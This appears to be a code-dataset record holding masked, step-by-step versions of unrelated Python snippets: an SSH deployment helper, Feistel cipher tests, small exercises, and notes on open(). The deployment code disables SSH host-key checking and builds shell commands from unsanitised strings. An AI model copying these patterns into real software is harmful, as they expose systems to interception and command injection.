SDTD-Mazerunner/script/'])\n out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',\n '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +\n ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info('Transfer done [success]')\n else:\n logging.error('Transferring files failed [error]')\n logging.info('Detar file ...')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info('Decompressing directory done [success]')\n else:\n logging.error('Decompressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; ./script/install_config_machine.py'])\n return\n",
"step-5": "#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport logging\n\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\n# Recover all ip for one component. Return format ip\ndef getHostsByKey(config, key):\n hosts = config.get(key, \"hosts\").split(',')\n index = 0\n for host in hosts:\n hosts[index] = host.strip(' \\n')\n index += 1\n return hosts\n\n\n# Function who return the ip of the current machine\ndef getIp():\n ip = os.popen('ifconfig ens3 | grep \"inet ad\" | cut -f2 -d: | awk \\'{print $1}\\'', \"r\").read()\n ip = ip.replace('\\n', '')\n return ip\n\n\n# Check if String il already present in the file\ndef isAlreadyAdd(pathFile, string):\n file = open(pathFile)\n for line in file:\n if string in line:\n return True\n return False\n\n\ndef deleteLineWithString(pathFile, stringResearch):\n contenu = \"\"\n fichier = open(pathFile, \"r\")\n for ligne in fichier:\n if not (stringResearch in ligne):\n contenu += ligne\n fichier.close()\n\n fichier = open('tmp.txt', 'w')\n fichier.write(contenu)\n fichier.close()\n os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')\n return\n\n\n# Function for check host\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\n# Function for recover ip by using server name\ndef getIpServerName(config, serverName):\n ip = \"\"\n value = serverName.split('-')\n if len(value) == 2:\n try:\n hosts = config.get(value[0], \"hosts\").split(',')\n ip = hosts[int(value[1]) - 1].strip(' \\n')\n except:\n return ip\n return ip\n\n\n# Function for update file on specific server\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf', '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'],\n cwd=os.getcwd(),\n stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info(\"Compressing directory done [success]\")\n else:\n logging.error(\"Compressing directory failed [error]\")\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'sudo rm -rf SDTD-Mazerunner/script/'])\n out = subprocess.run(\n ['scp', '-pq', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz',\n 'xnet@' + ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info(\"Transfer done [success]\")\n else:\n logging.error(\"Transferring files failed [error]\")\n logging.info(\"Detar file ...\")\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info(\"Decompressing directory done [success]\")\n else:\n logging.error(\"Decompressing directory failed [error]\")\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\n# Function for install basic environment\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; ./script/install_config_machine.py'])\n return\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
from MyFeistel import MyFeistel, LengthPreservingCipher
import pytest
import base64
import os
class TestMyFeistel:
def test_Functionality(self):
key = base64.urlsafe_b64encode(os.urandom(16))
feistel = MyFeistel(key, 10)
# decrypt(encrypt(msg)) == msg
for i in xrange(20):
msg = os.urandom(6)
assert feistel.decrypt(feistel.encrypt(msg)) == msg
def test_OddLengthMessage(self):
pass
class TestLengthPreservingCipher:
def test_Functionality(self):
key = base64.urlsafe_b64encode(os.urandom(16))
lpc = LengthPreservingCipher(key, 10)
# decrypt(encrypt(msg)) == msg
for i in xrange(20):
msg = os.urandom(6)
assert lpc.decrypt(lpc.encrypt(msg)) == msg
|
normal
|
{
"blob_id": "2464da1c4d2ddab3a053f0a14e3cc9a8beabe031",
"index": 6031,
"step-1": "<mask token>\n\n\nclass TestLengthPreservingCipher:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n",
"step-2": "<mask token>\n\n\nclass TestMyFeistel:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n feistel = MyFeistel(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert feistel.decrypt(feistel.encrypt(msg)) == msg\n <mask token>\n\n\nclass TestLengthPreservingCipher:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n",
"step-3": "<mask token>\n\n\nclass TestMyFeistel:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n feistel = MyFeistel(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert feistel.decrypt(feistel.encrypt(msg)) == msg\n\n def test_OddLengthMessage(self):\n pass\n\n\nclass TestLengthPreservingCipher:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n",
"step-4": "from MyFeistel import MyFeistel, LengthPreservingCipher\nimport pytest\nimport base64\nimport os\n\n\nclass TestMyFeistel:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n feistel = MyFeistel(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert feistel.decrypt(feistel.encrypt(msg)) == msg\n\n def test_OddLengthMessage(self):\n pass\n\n\nclass TestLengthPreservingCipher:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n",
"step-5": "from MyFeistel import MyFeistel, LengthPreservingCipher\nimport pytest\nimport base64\nimport os\n\nclass TestMyFeistel:\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n feistel = MyFeistel(key, 10)\n\n # decrypt(encrypt(msg)) == msg\n for i in xrange(20):\n msg = os.urandom(6)\n assert feistel.decrypt(feistel.encrypt(msg)) == msg\n def test_OddLengthMessage(self):\n pass\n\n\n\nclass TestLengthPreservingCipher:\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n\n # decrypt(encrypt(msg)) == msg\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(0, num):
element = float(input())
if i % 2 != 0:
even_sum += element
if element <= even_smallest:
even_smallest = element
if element > even_biggest:
even_biggest = element
else:
odd_sum += element
if element <= odd_smallest:
odd_smallest = element
if element > odd_biggest:
odd_biggest = element
if num == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
elif odd_sum == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
elif even_sum == 0:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
else:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
num = int(input())
odd_sum = 0
even_sum = 0
odd_smallest = sys.maxsize
even_smallest = sys.maxsize
odd_biggest = -sys.maxsize
even_biggest = -sys.maxsize
for i in range(0, num):
element = float(input())
if i % 2 != 0:
even_sum += element
if element <= even_smallest:
even_smallest = element
if element > even_biggest:
even_biggest = element
else:
odd_sum += element
if element <= odd_smallest:
odd_smallest = element
if element > odd_biggest:
odd_biggest = element
if num == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
elif odd_sum == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
elif even_sum == 0:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
else:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
<|reserved_special_token_1|>
import sys
num = int(input())
odd_sum = 0
even_sum = 0
odd_smallest = sys.maxsize
even_smallest = sys.maxsize
odd_biggest = -sys.maxsize
even_biggest = -sys.maxsize
for i in range(0, num):
element = float(input())
if i % 2 != 0:
even_sum += element
if element <= even_smallest:
even_smallest = element
if element > even_biggest:
even_biggest = element
else:
odd_sum += element
if element <= odd_smallest:
odd_smallest = element
if element > odd_biggest:
odd_biggest = element
if num == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
elif odd_sum == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
elif even_sum == 0:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
else:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
|
flexible
|
{
"blob_id": "69e8601a387d0987fbb6d1da5ac0f9412fffc63d",
"index": 8768,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(0, num):\n element = float(input())\n if i % 2 != 0:\n even_sum += element\n if element <= even_smallest:\n even_smallest = element\n if element > even_biggest:\n even_biggest = element\n else:\n odd_sum += element\n if element <= odd_smallest:\n odd_smallest = element\n if element > odd_biggest:\n odd_biggest = element\nif num == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelif odd_sum == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\nelif even_sum == 0:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelse:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\n",
"step-3": "<mask token>\nnum = int(input())\nodd_sum = 0\neven_sum = 0\nodd_smallest = sys.maxsize\neven_smallest = sys.maxsize\nodd_biggest = -sys.maxsize\neven_biggest = -sys.maxsize\nfor i in range(0, num):\n element = float(input())\n if i % 2 != 0:\n even_sum += element\n if element <= even_smallest:\n even_smallest = element\n if element > even_biggest:\n even_biggest = element\n else:\n odd_sum += element\n if element <= odd_smallest:\n odd_smallest = element\n if element > odd_biggest:\n odd_biggest = element\nif num == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelif odd_sum == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\nelif even_sum == 0:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelse:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\n",
"step-4": "import sys\nnum = int(input())\nodd_sum = 0\neven_sum = 0\nodd_smallest = sys.maxsize\neven_smallest = sys.maxsize\nodd_biggest = -sys.maxsize\neven_biggest = -sys.maxsize\nfor i in range(0, num):\n element = float(input())\n if i % 2 != 0:\n even_sum += element\n if element <= even_smallest:\n even_smallest = element\n if element > even_biggest:\n even_biggest = element\n else:\n odd_sum += element\n if element <= odd_smallest:\n odd_smallest = element\n if element > odd_biggest:\n odd_biggest = element\nif num == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelif odd_sum == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\nelif even_sum == 0:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelse:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#
# @lc app=leetcode id=1121 lang=python3
#
# [1121] Divide Array Into Increasing Sequences
#
# https://leetcode.com/problems/divide-array-into-increasing-sequences/description/
#
# algorithms
# Hard (53.30%)
# Likes: 32
# Dislikes: 11
# Total Accepted: 1.7K
# Total Submissions: 3.2K
# Testcase Example: '[1,2,2,3,3,4,4]\n3'
#
# Given a non-decreasing array of positive integers nums and an integer K, find
# out if this array can be divided into one or more disjoint increasing
# subsequences of length at least K.
#
#
#
# Example 1:
#
#
# Input: nums = [1,2,2,3,3,4,4], K = 3
# Output: true
# Explanation:
# The array can be divided into the two subsequences [1,2,3,4] and [2,3,4] with
# lengths at least 3 each.
#
#
# Example 2:
#
#
# Input: nums = [5,6,6,7,8], K = 3
# Output: false
# Explanation:
# There is no way to divide the array using the conditions required.
#
#
#
#
# Note:
#
#
# 1 <= nums.length <= 10^5
# 1 <= K <= nums.length
# 1 <= nums[i] <= 10^5
#
#
#
# @lc code=start
from collections import Counter
class Solution:
def canDivideIntoSubsequences(self, nums: List[int], K: int) -> bool:
return len(nums) >= K * max(Counter(nums).values())
# cur, groups = 1, 1
# for i in range(1, len(nums)):
# if nums[i] > nums[i - 1]:
# cur = 1
# else:
# cur += 1
# groups = max(groups, cur)
# return len(nums) >= K * groups
# @lc code=end
|
normal
|
{
"blob_id": "6b55a9061bb118558e9077c77e18cfc81f3fa034",
"index": 1092,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def canDivideIntoSubsequences(self, nums: List[int], K: int) ->bool:\n return len(nums) >= K * max(Counter(nums).values())\n",
"step-4": "from collections import Counter\n\n\nclass Solution:\n\n def canDivideIntoSubsequences(self, nums: List[int], K: int) ->bool:\n return len(nums) >= K * max(Counter(nums).values())\n",
"step-5": "#\n# @lc app=leetcode id=1121 lang=python3\n#\n# [1121] Divide Array Into Increasing Sequences\n#\n# https://leetcode.com/problems/divide-array-into-increasing-sequences/description/\n#\n# algorithms\n# Hard (53.30%)\n# Likes: 32\n# Dislikes: 11\n# Total Accepted: 1.7K\n# Total Submissions: 3.2K\n# Testcase Example: '[1,2,2,3,3,4,4]\\n3'\n#\n# Given a non-decreasing array of positive integers nums and an integer K, find\n# out if this array can be divided into one or more disjoint increasing\n# subsequences of length at least K.\n# \n# \n# \n# Example 1:\n# \n# \n# Input: nums = [1,2,2,3,3,4,4], K = 3\n# Output: true\n# Explanation: \n# The array can be divided into the two subsequences [1,2,3,4] and [2,3,4] with\n# lengths at least 3 each.\n# \n# \n# Example 2:\n# \n# \n# Input: nums = [5,6,6,7,8], K = 3\n# Output: false\n# Explanation: \n# There is no way to divide the array using the conditions required.\n# \n# \n# \n# \n# Note:\n# \n# \n# 1 <= nums.length <= 10^5\n# 1 <= K <= nums.length\n# 1 <= nums[i] <= 10^5\n# \n# \n#\n\n# @lc code=start\nfrom collections import Counter\n\nclass Solution:\n def canDivideIntoSubsequences(self, nums: List[int], K: int) -> bool:\n\n return len(nums) >= K * max(Counter(nums).values())\n\n # cur, groups = 1, 1\n # for i in range(1, len(nums)):\n # if nums[i] > nums[i - 1]:\n # cur = 1\n # else:\n # cur += 1\n # groups = max(groups, cur)\n # return len(nums) >= K * groups\n \n# @lc code=end\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def countLetters(self, S: str) ->int:
ans = 0
for _, g in itertools.groupby(S):
cnt = len(list(g))
ans += (1 + cnt) * cnt // 2
return ans
|
flexible
|
{
"blob_id": "f9cee552dde5ecf229fda559122b4b0e780c3b88",
"index": 7350,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def countLetters(self, S: str) ->int:\n ans = 0\n for _, g in itertools.groupby(S):\n cnt = len(list(g))\n ans += (1 + cnt) * cnt // 2\n return ans\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class String:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class String:
def reverse(self, s):
return s[::-1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class String:
def reverse(self, s):
return s[::-1]
<|reserved_special_token_0|>
print(obj1.reverse(s))
<|reserved_special_token_1|>
class String:
def reverse(self, s):
return s[::-1]
s = input()
obj1 = String()
print(obj1.reverse(s))
|
flexible
|
{
"blob_id": "c27c29a5b4be9f710e4036f7f73a89c7d20acea5",
"index": 4317,
"step-1": "class String:\n <mask token>\n\n\n<mask token>\n",
"step-2": "class String:\n\n def reverse(self, s):\n return s[::-1]\n\n\n<mask token>\n",
"step-3": "class String:\n\n def reverse(self, s):\n return s[::-1]\n\n\n<mask token>\nprint(obj1.reverse(s))\n",
"step-4": "class String:\n\n def reverse(self, s):\n return s[::-1]\n\n\ns = input()\nobj1 = String()\nprint(obj1.reverse(s))\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(f.read())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
f = open('1.txt', 'r', encoding='utf-8')
print(f.read())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
'''
python open() 函数用于打开一个文件,创建一个 file 对象,相关的方法才可以调用它进行读写。
更多文件操作可参考:Python 文件I/O。
函数语法
open(name[, mode[, buffering]])
参数说明:
name : 一个包含了你要访问的文件名称的字符串值。
mode : mode 决定了打开文件的模式:只读,写入,追加等。所有可取值见如下的完全列表。这个参数是非强制的,默认文件访问模式为只读(r)。
buffering : 如果 buffering 的值被设为 0,就不会有寄存。如果 buffering 的值取 1,访问文件时会寄存行。如果将 buffering 的值设为大于 1 的整数,表明了这就是的寄存区的缓冲大小。如果取负值,寄存区的缓冲大小则为系统默认。
不同模式打开文件的完全列表:
模式
描述
r
以只读方式打开文件。文件的指针将会放在文件的开头。这是默认模式。
rb
以二进制格式打开一个文件用于只读。文件指针将会放在文件的开头。这是默认模式。
r+
打开一个文件用于读写。文件指针将会放在文件的开头。
rb+
以二进制格式打开一个文件用于读写。文件指针将会放在文件的开头。
w
打开一个文件只用于写入。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。
wb
以二进制格式打开一个文件只用于写入。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。
w+
打开一个文件用于读写。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。
wb+
以二进制格式打开一个文件用于读写。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。
a
打开一个文件用于追加。如果该文件已存在,文件指针将会放在文件的结尾。也就是说,新的内容将会被写入到已有内容之后。如果该文件不存在,创建新文件进行写入。
ab
以二进制格式打开一个文件用于追加。如果该文件已存在,文件指针将会放在文件的结尾。也就是说,新的内容将会被写入到已有内容之后。如果该文件不存在,创建新文件进行写入。
a+
打开一个文件用于读写。如果该文件已存在,文件指针将会放在文件的结尾。文件打开时会是追加模式。如果该文件不存在,创建新文件用于读写。
ab+
以二进制格式打开一个文件用于追加。如果该文件已存在,文件指针将会放在文件的结尾。如果该文件不存在,创建新文件用于读写。
file 对象方法
file.read([size]):size 未指定则返回整个文件,如果文件大小 >2 倍内存则有问题,f.read()读到文件尾时返回""(空字串)。
file.readline():返回一行。
file.readlines([size]) :返回包含size行的列表, size 未指定则返回全部行。
for line in f: print line :通过迭代器访问。
f.write("hello\n"):如果要写入字符串以外的数据,先将他转换为字符串。
f.tell():返回一个整数,表示当前文件指针的位置(就是到文件头的比特数)。
f.seek(偏移量,[起始位置]):用来移动文件指针。
偏移量: 单位为比特,可正可负
起始位置: 0 - 文件头, 默认值; 1 - 当前位置; 2 - 文件尾
f.close() 关闭文件
open(filename [, mode [, bufsize]])
打开一个文件,返回一个file对象。 如果文件无法打开,将处罚IOError异常。
应该使用open()来代替直接使用file类型的构造函数打开文件。
参数filename表示将要被打开的文件的路径字符串;
参数mode表示打开的模式,最常用的模式有:'r'表示读文本,'w'表示写文本文件,'a'表示在文件中追加。
Mode的默认值是'r'。
当操作的是二进制文件时,只要在模式值上添加'b'。这样提高了程序的可移植性。
可选参数bufsize定义了文件缓冲区的大小。0表示不缓冲;1表示行缓冲;任何其他正数表示使用该大小的缓冲区;
负数表示使用系统默认缓冲区大小,对于tty设备它往往是行缓冲,而对于其他文件往往完全缓冲。如果参数值被省却。
使用系统默认值。
'''
f=open('1.txt','r',encoding='utf-8')
print(f.read())
'''
输出...
ltf
zhongguo
shanxi
yuncheng
男
20
'''
#参考博客 https://www.cnblogs.com/Devilf/p/8006663.html
|
flexible
|
{
"blob_id": "3a65565af4c55fa5479e323a737c48f7f2fdb8ce",
"index": 596,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(f.read())\n<mask token>\n",
"step-3": "<mask token>\nf = open('1.txt', 'r', encoding='utf-8')\nprint(f.read())\n<mask token>\n",
"step-4": "'''\npython open() 函数用于打开一个文件,创建一个 file 对象,相关的方法才可以调用它进行读写。\n更多文件操作可参考:Python 文件I/O。\n函数语法\nopen(name[, mode[, buffering]])\n参数说明:\nname : 一个包含了你要访问的文件名称的字符串值。\nmode : mode 决定了打开文件的模式:只读,写入,追加等。所有可取值见如下的完全列表。这个参数是非强制的,默认文件访问模式为只读(r)。\nbuffering : 如果 buffering 的值被设为 0,就不会有寄存。如果 buffering 的值取 1,访问文件时会寄存行。如果将 buffering 的值设为大于 1 的整数,表明了这就是的寄存区的缓冲大小。如果取负值,寄存区的缓冲大小则为系统默认。\n不同模式打开文件的完全列表:\n模式\n描述\nr\n以只读方式打开文件。文件的指针将会放在文件的开头。这是默认模式。\nrb\n以二进制格式打开一个文件用于只读。文件指针将会放在文件的开头。这是默认模式。\nr+\n打开一个文件用于读写。文件指针将会放在文件的开头。\nrb+\n以二进制格式打开一个文件用于读写。文件指针将会放在文件的开头。\nw\n打开一个文件只用于写入。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。\nwb\n以二进制格式打开一个文件只用于写入。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。\nw+\n打开一个文件用于读写。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。\nwb+\n以二进制格式打开一个文件用于读写。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。\na\n打开一个文件用于追加。如果该文件已存在,文件指针将会放在文件的结尾。也就是说,新的内容将会被写入到已有内容之后。如果该文件不存在,创建新文件进行写入。\nab\n以二进制格式打开一个文件用于追加。如果该文件已存在,文件指针将会放在文件的结尾。也就是说,新的内容将会被写入到已有内容之后。如果该文件不存在,创建新文件进行写入。\na+\n打开一个文件用于读写。如果该文件已存在,文件指针将会放在文件的结尾。文件打开时会是追加模式。如果该文件不存在,创建新文件用于读写。\nab+\n以二进制格式打开一个文件用于追加。如果该文件已存在,文件指针将会放在文件的结尾。如果该文件不存在,创建新文件用于读写。\nfile 对象方法\nfile.read([size]):size 未指定则返回整个文件,如果文件大小 >2 倍内存则有问题,f.read()读到文件尾时返回\"\"(空字串)。\nfile.readline():返回一行。\nfile.readlines([size]) :返回包含size行的列表, size 未指定则返回全部行。\nfor line in f: print line :通过迭代器访问。\nf.write(\"hello\\n\"):如果要写入字符串以外的数据,先将他转换为字符串。\nf.tell():返回一个整数,表示当前文件指针的位置(就是到文件头的比特数)。\nf.seek(偏移量,[起始位置]):用来移动文件指针。\n偏移量: 单位为比特,可正可负\n起始位置: 0 - 文件头, 默认值; 1 - 当前位置; 2 - 文件尾\nf.close() 关闭文件\n\n\nopen(filename [, mode [, bufsize]])\n打开一个文件,返回一个file对象。 